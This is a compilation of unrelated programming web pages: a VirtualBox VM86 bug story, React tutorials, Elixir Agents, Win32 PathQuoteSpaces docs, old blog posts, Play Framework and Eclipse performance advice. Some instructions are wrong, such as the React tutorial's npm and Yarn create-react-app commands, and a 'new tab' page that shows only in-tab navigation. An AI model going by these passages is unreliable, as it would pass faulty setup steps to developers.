When Intel, in the early 90s, wanted to keep compatibility with legacy 16-bit DOS code while running protected-mode OSes, they introduced the so-called VM86 mode. This mode was Intel's first take on virtualization, and calling it clumsy is a kind of compliment. The VIF (and VIP) flags are part of exactly this extension. VIF is a virtualized version of the IF flag (interrupts enabled flag). If a DOS application were allowed to modify the real IF, it could disable interrupts and render the whole system unusable. So instead, the cli instruction in VM86 mode affects only the VIF flag. At the same time, the pushf and popf instructions, which are (almost) the only way to access EFLAGS, were modified so that the value of the VIF bit is placed in the IF bit. And as VIF is bit 19 of EFLAGS, it's not visible in the 16-bit version of pushf.

So now the reason for the bug: sometimes FreeBSD executes BIOS calls in VM86 mode, which may modify the VIF flag on the CPU. When a protected-mode interrupt (such as the timer used for task scheduling) arrived at the wrong moment (when the VIF flag value was toggled), our dynamic recompiler wasn't clearing the VIF flag (as, according to the Intel/AMD instruction manuals, it shouldn't).
All following EFLAGS accesses then had the VIF flag setting mixed in, so to the OS it looked like the VIF bit toggled at random. The fix was not that hard: just mask out the VIF and VIP bits in EFLAGS when taking interrupts in VM86 mode, as those bits make no sense outside of VM86 mode.

The next post will cover the story of the most time-consuming bug I ever worked on (about 80 hours of continuous hacking).
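To make the fix concrete, here is a small C sketch of the masking. The bit positions come from the x86 manuals; the function itself is my own illustration, not the actual VirtualBox patch:

```c
#include <assert.h>
#include <stdint.h>

#define EFLAGS_VIF (1u << 19) /* virtual interrupt flag */
#define EFLAGS_VIP (1u << 20) /* virtual interrupt pending */

/* Drop the VM86-only bits when an interrupt takes us out of VM86 mode. */
uint32_t mask_vm86_bits(uint32_t eflags)
{
    return eflags & ~(EFLAGS_VIF | EFLAGS_VIP);
}
```

As a sanity check, the eflags value FreeBSD printed, 0x80247, is just an ordinary 0x247 with the VIF bit (bit 19, 0x80000) left set.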
https://blogs.oracle.com/nike/entry/bug_inverstigation_part_1_tale
A beginner's guide to developing with React

A step-by-step guide to using React in your web and mobile user interfaces.

React is a JavaScript user interface (UI) library that was built and is maintained by Facebook. React helps JavaScript developers think logically and functionally about how they want to build a UI.

With React, you can build:
- Single-page applications
- Applications that are easy to understand
- Scalable applications
- Cross-platform applications

React allows developers to build applications declaratively and offers a unidirectional flow of data.

React's advantages

The following features explain why React is one of the most popular web frameworks.
- It is declarative: React makes it extremely painless to build interactive user interfaces, design basic views for your application based on various states, and update and render new views when the data in your application changes.
- It is component-based: React gives you the ability to build encapsulated components that can manage their own state, then puts them together to build complex UIs. The logic of these components is written in JavaScript instead of templates, so you easily pass actual data and keep state out of the document object model (DOM).
- You can learn once, write anywhere: React gives you the ability to build for both mobile (React Native) and the web. There's no need to rewrite your existing codebase; you can just integrate React with your existing code.
- The virtual DOM: React introduced a wrapper around the regular DOM called the virtual DOM (VDOM). This allows React to render elements and update its state faster than the regular DOM.
- Performance: React has great performance benefits due to the VDOM and one-way flow of data.

The virtual DOM

React's VDOM is like a virtual copy of the original DOM.
It offers one-way data binding, which makes manipulating and updating the VDOM quicker than updating the original DOM. The VDOM can handle multiple operations in milliseconds without affecting the general page performance. This VDOM supports React's declarative API: you basically tell React what state you want the UI to be in, and it ensures that the DOM matches that state.

Prerequisites for learning React

Learning React requires basic knowledge of JavaScript, HTML, and CSS. To use React's power effectively, it helps to be familiar with ECMAScript 6 (ES6) and functional and object-oriented programming. You also need the following things installed on your computer:

Basic React concepts

It also helps to have an understanding of React's concepts.

Components

Components are standalone, reusable pieces of code. They have the same purpose as JavaScript functions but work alone and return HTML via a built-in render function. There are two main types of components:
- Class components offer more control in the form of lifecycle hooks, managing and handling state, and API calls. For example:

    class MyComponent extends React.Component {
      render() {
        return <div>This is a class component</div>;
      }
    }

- Functional components were used for rendering just views, without any form of state management or data requests, until React Hooks was introduced. For example:

    function myComponent() {
      return (
        <div>A functional Component</div>
      );
    }

Props

React props are like function arguments in JavaScript and attributes in HTML. They are read-only. For example:

    function Welcome(props) {
      return <h1>Hello, {props.name}</h1>;
    }

State

React components have a built-in object called state, which is where you store property values that belong to a particular component. If a component's state changes at any point in time, the component re-renders.
For example:

    class Car extends React.Component {
      constructor(props) {
        super(props);
        this.state = { brand: 'Ford' };
      }
      render() {
        return (
          <div>
            <h1>My Car</h1>
          </div>
        );
      }
    }

JSX

JSX is a syntax extension to JavaScript. It is similar to a template language but has the full power of JavaScript. JSX is compiled to React.createElement() calls, which return plain JavaScript objects called React elements. For example:

    return (
      <div>
        <h1>My Car</h1>
      </div>
    );

The code between the return method that looks like HTML is JSX.

How to use React

Ready to get started? I'll go step-by-step through two options for using React in your app:
- Adding its content delivery network (CDN) to your HTML file
- Starting a blank React app with Create React App

Add its CDN to your HTML file

You can quickly use React in your HTML page by adding its CDN directly to your HTML file using the following steps:

Step 1: In the HTML page you want to add React to, add an empty <div> tag to create a container where you want to render something with React. For example:

    <div id="button_container"></div>

Step 2: Add three <script> tags to the HTML page just before the closing </body> tag. For example:

      <!-- ... Some other HTML ... -->

      <!-- Initiate React. -->
      <!-- Note: when deploying, replace "development.js" with "production.min.js". -->
      <script src="" crossorigin></script>
      <script src="" crossorigin></script>

      <!-- Load our React component. -->
      <script src="button.js"></script>

    </body>

The first two script tags load React, and the last one loads your React component code.

Step 3: Create a file called button.js in the same folder as your HTML page to hold the code for your React component.
Paste the following code inside your button.js file:

    'use strict';

    const e = React.createElement;

    class Button extends React.Component {
      constructor(props) {
        super(props);
        this.state = { clicked: false };
      }

      render() {
        if (this.state.clicked) {
          return 'You clicked this button.';
        }
        return e(
          'button',
          { onClick: () => this.setState({ clicked: true }) },
          'Click Me'
        );
      }
    }

This code creates a button component that returns a message when the button is clicked.

Step 4: To use this component in your HTML page, add the code snippet below at the end of your button.js file:

    const domContainer = document.querySelector('#button_container');
    ReactDOM.render(e(Button), domContainer);

The code snippet above targets the <div> you added to your HTML in the first step and renders your React button component inside it.

Start a blank React app with Create React App

If you want to start with a blank React app, use Create React App. This is the recommended way to quickly create single-page React applications, as it provides a modern build setup without any configuration. To generate a new React app using Create React App, enter one of the following commands in your terminal. This will create a new React app called my-app:
- npx (this is the recommended way to use create-react-app): npx create-react-app my-app
- npm: npm i -g create-react-app && npm create-react-app my-app
- Yarn: yarn add create-react-app && yarn create-react-app my-app

To run your newly created app, navigate into the app folder (by typing cd my-app into your terminal) and enter one of the following commands:
- npm: npm start
- Yarn: yarn start

These will run the app you just created in development mode. You can open http://localhost:3000 to view it in the browser. When you navigate there, you should see a page like the one below. Any change you make in the React code will automatically render here.

I hope this guide to getting started with React has been helpful.
There are many more things to discover in the world of JavaScript, so please explore on your own and share what you learn. This article originally appeared on Shedrack Akintayo's blog and is republished with his permission.

2 Comments

Sweet intro! Thanks. Any thoughts about using React with Typescript and the likes for added type safety?

It's totally sweet IMO, if you are a fan of static typing then React + typescript is a really good bet!
https://opensource.com/article/20/11/reactjs-tutorial
Today, we want to share with you how to open a new tab in React. In this post we will show you how to open a URL in a new tab using ReactJS, with a demo and an example you can implement, and we will learn how to make links open in a new window or tab.

How to open new tab in react js - Example

The following are simple ways to navigate in ReactJS, with example source code.

Using history.push()

    this.props.history.push("/first");

Using withRouter

    import { withRouter } from "react-router-dom";
    export default withRouter(yourComponent);

Using the Redirect component, which requires us to render it

    import { Redirect } from "react-router-dom";

    state = { redirect: null };

    render() {
      if (this.state.redirect) {
        return <Redirect to={this.state.redirect} />;
      }
      return (
        // Your source code goes here
      );
    }

    this.setState({ redirect: "/getProducts" });

Summary

You can also read about AngularJS, ASP.NET, Vue.js, and PHP. I hope you get an idea about how to open a new tab in React.
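Note that the router-based snippets above navigate within the current tab. To open a URL in a genuinely new browser tab, you would typically reach for window.open with the _blank target. Here is a small sketch; the helper name and the injected win parameter are my own, chosen so the function can be exercised outside a browser:

```javascript
// Opens `url` in a new tab. The window object is passed in as `win`
// so the helper can run (and be tested) outside a real browser;
// in a browser you would pass the global `window`.
function openInNewTab(win, url) {
  // "noopener,noreferrer" keeps the new tab from reaching back into
  // this one via window.opener.
  return win.open(url, "_blank", "noopener,noreferrer");
}

// Browser usage would be: openInNewTab(window, "https://example.com");
```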
https://www.pakainfo.com/how-to-open-new-tab-in-react-js-example/
We recently saw how Elixir's GenServer works by building a shared id map. We used a GenServer because we wanted to have the id map periodically refreshed, which required that we take advantage of the Process.send_after function. However, without this requirement, we could have used an Agent to achieve our goal with much less effort. Where a GenServer has a fairly flexible API and purpose, an Agent is more specialized, as it's largely driven by two functions: get and update.

When we started our GenServer, we passed it the module which implemented the GenServer behaviour. An Agent, being simpler, doesn't require such decoration. However, just like we wanted to encapsulate the GenServer implementation within our module, so too do we want to encapsulate the Agent implementation. But things are still a little different; consider how we start an Agent:

    defmodule Goku.IdMap do
      @name __MODULE__

      def start_link(_opts) do
        Agent.start_link(fn -> load() end, name: @name)
      end

      defp load() do
        %{"goku" => 1, "gohan" => 2}
      end
    end

Our Agent will still be supervised, which is what will call this module's start_link function. But there's no behaviour to implement. An Agent is just state that we can get and update. Anything we add to this module is just there to create a nicer API around the Agent, not something the Agent itself needs (like the GenServer's handle_* functions).

We use get to get data from our state:

    def get(key) do
      Agent.get(@name, fn state -> Map.get(state, key) end)
    end

Behind the scenes, this behaves like our GenServer. The data/state is owned by our Agent, so while Agent.get is called by one process, the closure is executed by our Agent's process. What you're seeing here is just a more focused API for doing a GenServer.call with a handle_call that returns a value and doesn't modify the state.
(I'll repeat this over and over again: in Elixir, data ownership doesn't move around and isn't global like in many other languages.)

The update function expects you to return the new state. For completeness, we could reload the state like so:

    def update() do
      Agent.update(@name, fn _old_state -> load() end)
    end

A more idiomatic example might be one where our state represents a queue that we want to push a value onto:

    def push(value) do
      Agent.update(@name, fn queue -> [value | queue] end)
    end

There's also a get_and_update, which expects a tuple of two values, the first being the value to get, the second being the new state. And, like a GenServer, all these functions let you specify a timeout. There are a few more functions available, but you get the idea.

Anything you can do with an Agent, you can also do with a GenServer (the reverse isn't true). The Agent's advantages are its simpler API and the more expressive code that results. It's probably a safe rule to say that if you can use an Agent, you should. And, if your needs grow, converting an Agent to a GenServer should be trivial.

But, again, the important point here is to understand the multi-process interaction that's going on. Because we're using closures, it's less obvious here than with a GenServer. In the push example above, you have a single line of code that represents two statements, each being executed by a distinct process. Practically speaking, that detail probably won't matter. But the more clearly you grasp the fundamentals, the better your code will be.
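To make the two-process reading of that push line tangible for readers coming from other languages, here is a toy Python analogue (entirely my own construction; not Elixir, and not how the BEAM works internally): closures are shipped to a worker thread that alone owns the state.

```python
import queue
import threading

class Agent:
    """Toy, single-owner state holder loosely mimicking Elixir's Agent.

    Every closure is executed by the agent's own worker thread, so the
    state is only ever touched by that one thread -- the ownership point
    the article makes about processes.
    """

    def __init__(self, initial_state):
        self._state = initial_state
        self._inbox = queue.Queue()
        threading.Thread(target=self._loop, daemon=True).start()

    def _loop(self):
        while True:
            fn, reply = self._inbox.get()
            result, self._state = fn(self._state)
            reply.put(result)

    def _call(self, fn):
        reply = queue.Queue()
        self._inbox.put((fn, reply))
        return reply.get()  # the caller blocks, like GenServer.call

    def get(self, fn):
        return self._call(lambda state: (fn(state), state))

    def update(self, fn):
        self._call(lambda state: (None, fn(state)))

    def get_and_update(self, fn):
        # fn returns a (value, new_state) tuple, as in Elixir
        return self._call(fn)
```

So `agent.update(lambda q: [5] + q)` pushes a value much like the Elixir push above, with the closure running in the agent's thread, not the caller's.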
https://www.openmymind.net/Learning-Elixir-Agent/
PathQuoteSpaces function

Searches a path for spaces. If spaces are found, the entire path is enclosed in quotation marks.

Syntax

    BOOL PathQuoteSpaces(
      _Inout_ LPTSTR lpsz
    );

Parameters

- lpsz [in, out]
  Type: LPTSTR
  A pointer to a null-terminated string that contains the path to search. The size of this buffer must be set to MAX_PATH to ensure that it is large enough to hold the returned string.

Return value

Type: BOOL
TRUE if spaces were found; otherwise, FALSE.

Examples

    #include <windows.h>
    #include <iostream>
    #include "Shlwapi.h"

    int main(void)
    {
        // Path with spaces.
        char buffer_1[MAX_PATH] = "C:\\sample_one\\sample two";
        char *lpStr1 = buffer_1;

        // Path before quoting spaces.
        std::cout << "The path before PathQuoteSpaces: " << lpStr1 << std::endl;

        // Call "PathQuoteSpaces".
        PathQuoteSpaces(lpStr1);

        // Path after quoting spaces.
        std::cout << "The path after PathQuoteSpaces: " << lpStr1 << std::endl;
        return 0;
    }

    OUTPUT:
    ==================
    The path before PathQuoteSpaces: C:\sample_one\sample two
    The path after PathQuoteSpaces: "C:\sample_one\sample two"

Requirements
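For readers without a Windows toolchain, the behavior is easy to model. Below is a portable C sketch of the same idea; it is not the Win32 implementation, and quote_spaces is an invented name:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Portable sketch of what PathQuoteSpaces does: if the path contains a
   space, wrap the whole string in double quotes in place. Returns 1 if
   spaces were found (and quotes added), 0 otherwise. `cap` is the total
   buffer capacity, which must leave room for the two quotes. */
int quote_spaces(char *buf, size_t cap)
{
    size_t len = strlen(buf);
    if (strchr(buf, ' ') == NULL)
        return 0;                   /* no spaces: leave the path alone */
    if (len + 3 > cap)
        return 0;                   /* not enough room for quotes + NUL */
    memmove(buf + 1, buf, len + 1); /* shift right, moving the NUL too */
    buf[0] = '"';
    buf[len + 1] = '"';
    buf[len + 2] = '\0';
    return 1;
}
```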
http://msdn.microsoft.com/en-us/library/bb773739(v=vs.85).aspx
November 29, 2003

Even More Knoppix

The adoration continues. I hadn't realised until I read System recovery with Knoppix, that Knoppix comes with QTParted. This is a robust, open source partition manager: the free software equivalent of Partition Magic. I've been looking for something like this for a while. It seems that every time I buy a new machine I have to buy a new version of Partition Magic, because the current copy I have won't work with the new operating system or file systems that it uses. With this kind of planned obsolescence I end up spending quite a bit; well, not any longer.

Posted by Andy Todd at 12:05 PM | Comments (1)

November 24, 2003

Always Learning

Here is a really useful feature that I didn't know about until today - function-based indexes in Oracle. Cool. How I wish we could use them in DB2, because it suffers from the same problem that Oracle used to. Namely, that applying a function to a column means that it can't be accessed via an index - with a requisite decrease in the speed of queries. I'm getting a little grief from our client at the moment because all of our date information is stored in TIMESTAMP columns. They don't like the fact that when they access data by day they have to use a function ('DATE') to split out the date part. It doesn't matter that they can use 'BETWEEN' to achieve the same thing and that it will use an index. They are insisting I replace all of the TIMESTAMP columns in our database with separate DATE and TIME ones. I suspect that this is because it's common practise on their mainframe DB2 systems, but I may be wrong.

[Courtesy of Alan Green in turn courtesy of Simon Brunning]

Posted by Andy Todd at 01:36 PM | Comments (2)

November 21, 2003

Free Software

As featured on Slashdot today, TheOpenCD. I shall be pressing up a few and handing them around at work.
My tactic is to impress people with the free-as-in-beer aspect of these programs, which will then hopefully lead to an appreciation of their free-as-in-speech qualities.

Posted by Andy Todd at 02:12 PM | Comments (0)

November 12, 2003

MP3 Jukebox Hacking

It looks like I can upgrade the firmware on my Archos Jukebox. It's open source to boot. Cool. I don't think you can do this with your iPod.

<Update> Emboldened by my success "upgrading" the firmware, I resolved once more to get the thing to mount on my Debian box. A little light googling led me to the hotplug package. After apt-get'ting it I plugged in the Jukebox, turned it on and - nothing. I had added the appropriate line to my /etc/fstab file;

    /dev/sda1 /mnt/archos auto rw,user,noauto 0 0

But all I got was an error message saying no medium found. As a last resort I rebooted - and everything worked. Woo, and furthermore, hoo. Hope that answers your question Vale. </Update>

Posted by Andy Todd at 11:45 AM | Comments (0)

November 04, 2003

Right Padding A String

I've been writing some Java today, shock horror. I approached it as if I was writing some Python code, but just with more symbols in the source code. It was a nice reminder that even in such similar languages, common idioms don't necessarily travel. As an example, I wanted to right pad a string. This isn't supported by the String class, so I wrote a method;

    public String rightPad(String s, int length, char pad) {
        StringBuffer buffer = new StringBuffer(s);
        int curLen = s.length();
        if (curLen < length) {
            for (int i = curLen; i < length; i++) {
                buffer.append(pad);
            }
        }
        return buffer.toString();
    }

Then I tried to implement it in Python. Here is my first pass;

    def fill(fillString, toLength, fillChar):
        while len(fillString) < toLength:
            fillString += fillChar
        return fillString

Which is pretty much a direct copy of the Java code.
But, I thought, there must be a more Pythonic way, so I came up with;

    def newFill(fillString, toLength, fillChar):
        return fillString + ''.join([fillChar for x in range(len(fillString), toLength)])

Hmmm, I'm not sure if it's better, or just more obscure. It looks awfully LISP-like to me.

Posted by Andy Todd at 08:28 PM | Comments (9)
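A footnote from a later vantage point: newer Python versions let str.ljust take a fill character, which makes the whole exercise a one-liner (the helper names below are mine):

```python
def fill_ljust(fill_string, to_length, fill_char):
    # str.ljust pads on the right up to to_length
    # (and is a no-op if the string is already longer)
    return fill_string.ljust(to_length, fill_char)

def fill_repeat(fill_string, to_length, fill_char):
    # string repetition; max() guards against a negative repeat count
    return fill_string + fill_char * max(0, to_length - len(fill_string))

print(fill_ljust("pad", 6, "x"))  # → padxxx
```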
https://halfcooked.com/mt/archives/2003_11.html
§Manipulating Results

§Changing the default Content-Type

The result content type is automatically inferred from the Scala value that you specify as the response body. For example:

    val textResult = Ok("Hello World!")

Will automatically set the Content-Type header to text/plain, while:

    val xmlResult = Ok(<message>Hello World!</message>)

will set the Content-Type header to application/xml.

Tip: this is done via the play.api.http.ContentTypeOf type class.

This is pretty useful, but sometimes you want to change it. Just use the as(newContentType) method on a result to create a new similar result with a different Content-Type header:

    val htmlResult = Ok(<h1>Hello World!</h1>).as("text/html")

or even better, using:

    val htmlResult2 = Ok(<h1>Hello World!</h1>).as(HTML)

Note: The benefit of using HTML instead of "text/html" is that the charset will be automatically handled for you and the actual Content-Type header will be set to text/html; charset=utf-8. We will see that in a bit.

§Manipulating HTTP headers

You can also add (or update) any HTTP header of the result:

    val result = Ok("Hello World!").withHeaders(
      CACHE_CONTROL -> "max-age=3600",
      ETAG -> "xx")

Note that setting an HTTP header will automatically discard the previous value if it existed in the original result.

§Setting and discarding cookies

Cookies are just a special form of HTTP headers, but we provide a set of helpers to make them easier to work with. You can easily add a Cookie to the HTTP response using:

    val result = Ok("Hello world").withCookies(
      Cookie("theme", "blue"))

Also, to discard a Cookie previously stored on the Web browser:

    val result2 = result.discardingCookies(DiscardingCookie("theme"))

You can also set and remove cookies as part of the same response:

    val result3 = result.withCookies(Cookie("theme", "blue")).discardingCookies(DiscardingCookie("skin"))

§Changing the charset for text based HTTP responses

For text-based HTTP responses it is very important to handle the charset correctly.
Play handles that for you and uses utf-8 by default (see why to use utf-8). The charset is used both to convert the text response to the corresponding bytes to send over the network socket, and to update the Content-Type header with the proper ;charset=xxx extension.

The charset is handled automatically via the play.api.mvc.Codec type class. Just import an implicit instance of play.api.mvc.Codec in the current scope to change the charset that will be used by all operations:

    class Application extends Controller {

      implicit val myCustomCharset = Codec.javaSupported("iso-8859-1")

      def index = Action {
        Ok(<h1>Hello World!</h1>).as(HTML)
      }

    }

Here, because there is an implicit charset value in the scope, it will be used by both the Ok(...) method to convert the XML message into ISO-8859-1 encoded bytes and to generate the text/html; charset=iso-8859-1 Content-Type header.

Now if you are wondering how the HTML method works, here is how it is defined:

    def HTML(implicit codec: Codec) = {
      "text/html; charset=" + codec.charset
    }

You can do the same in your API if you need to handle the charset in a generic way.
https://www.playframework.com/documentation/2.5.x/ScalaResults
Performance Bloopers

This page is intended as a resource for developers to consult to build their general knowledge of problems, techniques, etc. Check back often and contribute your own bloopers.

Excessive crawling of the extension registry

As described in the previous blooper, the Eclipse extension registry is now loaded from disk on demand, and discarded when no longer referenced. This speed/space trade-off has created the possibility of a whole new category of performance blooper for clients of the registry. For example, here is a block of code that was actually discovered in a third-party plugin:

    IExtensionRegistry registry = Platform.getExtensionRegistry();
    IExtensionPoint[] points = registry.getExtensionPoints();
    for (int i = 0; i < points.length; i++) {
        IExtension[] extensions = points[i].getExtensions();
        for (int j = 0; j < extensions.length; j++) {
            IConfigurationElement[] configs = extensions[j].getConfigurationElements();
            for (int k = 0; k < configs.length; k++) {
                if (configs[k].getName().equals("some.name")) {
                    // do something with this config
                }
            }
        }
    }

Prior to Eclipse 3.1, the above code was actually not that terrible. Although the extension registry has been loaded lazily since Eclipse 2.1, it always stayed in memory once loaded. If the above code ran after the registry was in memory, most of the registry API calls were quite fast. This is no longer true. In Eclipse 3.1, the above code will now cause the entire extension registry, several megabytes for a large Eclipse-based product, to be loaded into memory. While this is an extreme case, there are plenty of examples of code that is performing more registry access than necessary. These inefficiencies were not apparent with a memory-resident extension registry.

Avoidance techniques: Avoid calling extension registry API when not needed. Use shortcuts as much as possible. For example, directly call IExtensionRegistry.getExtension(...)
rather than IExtensionRegistry.getExtensionPoint(...).getExtension(...). Some extra shortcut methods were added in Eclipse 3.1 to help clients avoid unnecessary registry access. For example, to find the plugin ID (namespace) for a configuration element, clients would previously call IConfigurationElement.getDeclaringExtension().getNamespace(). It is much more efficient to call the new IConfigurationElement.getNamespace() method directly, saving the IExtension object from potentially being loaded from disk.

Message catalog keys

The text messages required for a particular plugin are typically contained in one or more Java properties files. These message bundles have key-value pairs where the key is some useful token that humans can read and the value is the translated text of the message. Plugins are responsible for loading and maintaining the messages. Typically this is done on demand, either when the plugin is started or when the first message from a particular bundle is needed. Loading one message typically loads all messages in the same bundle. There are several problems with this situation:
- Again we have the inefficient use of Strings as identifiers. Other than readability in the properties file, having human-readable keys is not particularly compelling. Assuming the use of constants, int values would be just as functional.
- Similarly, the use of String keys requires the use of Hashtables to store the loaded message bundles. Some array-based structure would be more efficient.
- The Eclipse SDK contains tooling which helps users "externalize" their Strings. That is, it replaces embedded Strings with message references and builds the entries in the message bundles. This tool can generate the keys for the messages as they are discovered. Unfortunately, the generated keys are based on the fully qualified class/method name where the string was discovered. This makes for quite long keys (e.g., keys greater than 90 characters long were discovered in some of the Debug plugins).
This makes for quite long keys (e.g., keys greater than 90 characters long were discovered in some of the Debug plugins).

Avoidance techniques: There are several facets to this problem, but the basic lesson here is to understand the space you are using. Long keys are not particularly useful and just waste space. String keys are good for developers, but end users pay the space cost. Mechanisms like bundle loading/management which are going to be used throughout the entire system should be well thought out and supplied to developers rather than leaving it up to each to do their own (inefficient) implementation. With that in mind, below are some of the many possible alternatives:
- Shorter keys: Clearly the message keys should be useful but not excessively long.
- Use the Eclipse 3.1 message bundle facility, org.eclipse.osgi.util.NLS. This API binds each message in your catalog to a Java field, eliminating the notion of keys entirely and yielding a huge memory improvement over the basic Java PropertyResourceBundle.

Eager preference pages

The JDT UI plugin has a number of preference pages, each represented by a class. Each set of preferences has a set of default values, and the preference pages have methods which set the preferences to their default values. In Eclipse 2.1, when the JDT UI plugin started, it called the preference initialization method on the various preference page classes. As a result, the preference page classes were loaded. It turns out that a) there are many preference pages and b) the classes sometimes contain extensive UI code. The net result is that some 250Kb of code is loaded and typically never used, since users rarely consult preference pages once acceptable values are set.

Avoidance techniques: Refactor the code to move the preference initialization code onto dedicated or pre-existing classes. Preference page classes can then be loaded on demand by the workbench's lazy loading mechanism. Note: This problem has been seen in other plugins, likely as a result of cut-and-paste coding with JDT as a base.

Too much work on activation

Plugins are activated as needed. Typically this means that a plugin is activated the first time one of its classes is loaded. On activation, the plugin's runtime class (aka plugin class) is loaded and instantiated and the startup() lifecycle method is called. This gives the plugin a chance to do rudimentary initialization and hook itself into the platform more tightly than is allowed by the extension mechanisms in the plugin.xmls. Unfortunately, developers seize the opportunity and do all manner of work. Also unfortunate is the fact that activation is done in a context-free manner. For example, at activation time the JDT Core plugin does not know why it is being activated. It might be because someone is trying to compile/build some Java, or it might be because class C in some other plugin subclasses a JDT class and C is being loaded. In the former case it would be reasonable for JDT Core to load/initialize required state, create new structures, etc. In the latter this would be completely unreasonable. We have seen cases where literally hundreds of classes and megabytes of code have been loaded (not to mention all the objects created) just to check and see that there was nothing to do. This behavior impacts platform startup time if the plugins in question contribute to the current UI/project structure, or imposes lengthy delays in the user's workflow when they suddenly (often unknowingly) invoke some new function requiring the errant plugin to be activated.

Avoidance techniques: The platform provides lazy activation of plugins. Plugins are responsible for efficiently creating their internal structures according to the function required. The startup() method is not the time or place to be doing large-scale initialization.
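The remedy just described, deferring expensive setup until a client actually asks for it, can be sketched in plain Java. The class and field names here are illustrative stand-ins, not Eclipse API: the point is only that the constructor (standing in for startup()) stays cheap, and the expensive model is built on first use.

```java
import java.util.HashMap;
import java.util.Map;

// Sketch: defer expensive model construction until first use,
// instead of building it eagerly at plugin activation time.
class LazyModelRegistry {

    // Built on demand, not at activation; null means "not loaded yet".
    private Map<String, String> model;

    // Cheap "activation": record that we exist, build nothing yet.
    LazyModelRegistry() {
    }

    // The expensive work happens here, only when first requested.
    private Map<String, String> model() {
        if (model == null) {
            model = new HashMap<>();
            model.put("greeting", "hello");
        }
        return model;
    }

    String lookup(String key) {
        return model().get(key);
    }

    boolean isLoaded() {
        return model != null;
    }
}
```

Clients that never call lookup() never pay for the model at all, which is exactly the behavior the platform's lazy activation is trying to preserve.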
Decorators

The UI plugin provides a mechanism for decorating resources with icons and text (e.g., adding the little 'J' on Java projects or the CVS version number to the resource label). Plugins contribute decorators by extending a UI extension point, specifying the kind of element they would like to decorate. When a resource of the identified kind is displayed, all installed decorators are given a chance to add their bit to the visual presentation. This model/mechanism is simple and clean. There are performance consequences, however:
- Early plugin activation: In many scenarios, plugins get activated well before their function is actually needed. Further, because of the "Too much work at activation" blooper, the activated plugins often did way more work than was required. In many cases whether or not a resource should be decorated is predicated on a simple test (e.g., does it have a particular persistent property). These require almost no code and certainly no complicated domain/model structures.
- Resource leaks: The mechanism can leak images even if individual decorators are careful. decorateImage() wants to return an image. If a decorator simply creates a new image and returns it (i.e., without remembering it) then there is no way of disposing it. To counter this, decorators typically maintain a list of the images they have provided. Unfortunately, this list is monotonically increasing if they still create (but remember) a new image for every decoration request. To counter this, well-behaved decorators cache the images they supply based on some key. The key is typically a combination of the base image provided and the decoration they add. This key then allows decorators to return an already allocated image if the net result of the requested decoration is the same as some previous result. Since decorators are chained, all decorators must have this good behaviour. If just one decorator in a chain returns a new image, then the caching strategies of all following decorators are foiled and once again resources are leaked.
- Threading: Decorators run in the foreground, which causes problems for some plugins (e.g., CVS). To work around this, heavy-weight decorators have a background thread which computes the decorations and then issues a label change event to update the UI. This does not scale. When a label changed event is posted, all decorators are run again. This allows the decorators following the heavy-weight contributor to add their decoration. The net result is a flurry of label change events, decoration requests and UI updates, most of which do little or nothing. Further, the problem gets worse quickly as heavy-weight decorators are added.
- Code complexity: While this is not directly a performance problem, it does lead to performance issues, as the code here is complex and hard to test. To do decorators correctly, plugin writers have to write their own caching code as well as their own threading code (assuming they have heavy decorator logic). Both chunks of code are complicated, error-prone and likely very much the same from plugin to plugin: prime candidates for inclusion in the base mechanism.

Avoidance techniques: The UI team tackled this problem by providing more decorator infrastructure.
- The semantic level of the decorator API was raised so that decorators describe their decorations rather than directly acting. This allows the UI mechanisms to manage a central image cache and create fewer intermediate image results by applying all decorations at once.
- The Workbench also manages a background decoration thread. All heavy-weight decorators are run together in the background and their results combined and presented in one label changed event.
- Static decoration information can now be declared in the plugin.xml. This allows plugins to contribute decorators without loading/running any of their code (a big win!).
The plugin describes the conditions for decoration (based on the existence of properties, resource types, etc.) and the decoration image and position. The Workbench does the rest.

PDE cycle detection

PDE Core used to have a linear list of plug-in models generated by parsing manifest files. Meanwhile, the manifest editor has a small 'Issues and Action Items' area in the Overview page. Among other things, this area shows problems related to the plug-in to which the manifest file belongs. One of the problems that can be detected is cyclical plug-in dependencies. When opened, this section will initiate a cycle detection computation. The cycle detection computation follows the dependency graphs trying to find closures. It follows the graph by looping through the plug-in IDs, looking up plug-in models that match the IDs, then recursively following their dependencies. In the original implementation, each ID->model lookup was done linearly (by iterating over the flat list of models).

Avoidance techniques: In a large product with 600 plug-ins and a convoluted dependency tree, we got complaints that the manifest editor took 3 minutes to open in some cases! After performance analysis, we replaced the linear lookup with a hash table (using the plug-in ID as the lookup key). The opening time was reduced to 3 seconds (worst-case scenario)! And we already had this table in place for other purposes; the actual fix took 2 minutes to do.

Too many resource change listeners

PRE_AUTO_BUILD and POST_AUTO_BUILD resource change listeners have a non-trivial cost associated with them. This is because a new tree layer must be created to allow the listener to make changes to the tree. It was discovered that of the five BUILD listeners that were typically running, four of them were from the org.eclipse.team.cvs plug-ins. See the bug report for more details.

Avoidance techniques: Minimize use of these listeners. Some ideas:
- POST_CHANGE listeners have trivial cost; switch to POST_CHANGE where possible.
- Two listeners cost more than one. Try to create just one and delegate the work from there.
- Consider removing listeners when they are not applicable. For example, if you are listening for changes on a particular file or directory, you may be able to remove that listener when the applicable resource is not present.
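The PDE fix described above, swapping a per-lookup linear scan for a hash table keyed by plug-in ID, amounts to the following sketch. PluginModel and ModelIndex are illustrative stand-ins, not the real PDE classes; the shape of the trade-off is the point.

```java
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Stand-in for a PDE plug-in model: just an ID and its dependencies.
class PluginModel {
    final String id;
    final List<String> requires;

    PluginModel(String id, List<String> requires) {
        this.id = id;
        this.requires = requires;
    }
}

class ModelIndex {

    // The original implementation: O(n) per lookup, repeated for every
    // edge the cycle detector follows through the dependency graph.
    static PluginModel findLinear(List<PluginModel> models, String id) {
        for (PluginModel m : models) {
            if (m.id.equals(id)) {
                return m;
            }
        }
        return null;
    }

    // The fix: build the index once; every subsequent ID->model lookup
    // during cycle detection is then a constant-time hash probe.
    static Map<String, PluginModel> index(List<PluginModel> models) {
        Map<String, PluginModel> byId = new HashMap<>();
        for (PluginModel m : models) {
            byId.put(m.id, m);
        }
        return byId;
    }
}
```

With hundreds of plug-ins and a recursive graph walk, the difference between n scans of an n-element list and n hash probes is exactly the 3-minutes-to-3-seconds improvement reported above.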
http://wiki.eclipse.org/index.php?title=Performance_Bloopers&diff=6242&oldid=6241
Create a Business Service with Node.js using Visual Studio Code

04/25/2019

You will learn:
- How to develop a sample business service using the SAP Cloud Application Programming Model and Node.js
- Define a simple data model and a service that exposes the entities you created in your data model
- Run your service locally
- Deploy the data model to an SQLite database
